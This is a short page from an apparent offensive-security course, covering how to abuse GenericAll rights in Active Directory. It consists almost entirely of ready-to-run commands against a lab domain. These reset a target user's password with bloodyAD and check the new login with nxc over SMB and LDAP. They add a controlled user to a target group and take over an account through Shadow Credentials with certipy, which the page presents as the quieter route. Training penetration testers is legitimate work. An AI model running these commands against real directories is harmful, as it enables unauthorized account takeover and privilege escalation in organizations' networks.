Operator On The Wire
← Back to Knowledge Base
OOTW / Chapter IV - Active Directory / 04. Techniques / ACL Abuse / GenericAll / Techniques

Linux

Set variables:

export DC=10.10.10.200
export DOMAIN=ootw.local

For a user target, reset the password:

bloodyAD -d $DOMAIN --host $DC -u ben.carter -p 'StudentPass2026!' set password svc_web 'WebReset2026!'

Validate:

nxc smb $DC -d $DOMAIN -u svc_web -p 'WebReset2026!'
nxc ldap $DC -d $DOMAIN -u svc_web -p 'WebReset2026!'

For a group target, add a controlled user:

bloodyAD -d $DOMAIN --host $DC -u ben.carter -p 'StudentPass2026!' add groupMember 'TARGET GROUP' alice.wright

For a quieter user takeover, use Shadow Credentials:

certipy shadow auto -u ben.carter@ootw.local -p 'StudentPass2026!' -account svc_web -dc-ip $DC

OOTW edge:

nxc ldap $DC -d $DOMAIN -u ben.carter -p 'StudentPass2026!'
bloodyAD -d $DOMAIN --host $DC -u ben.carter -p 'StudentPass2026!' get object svc_web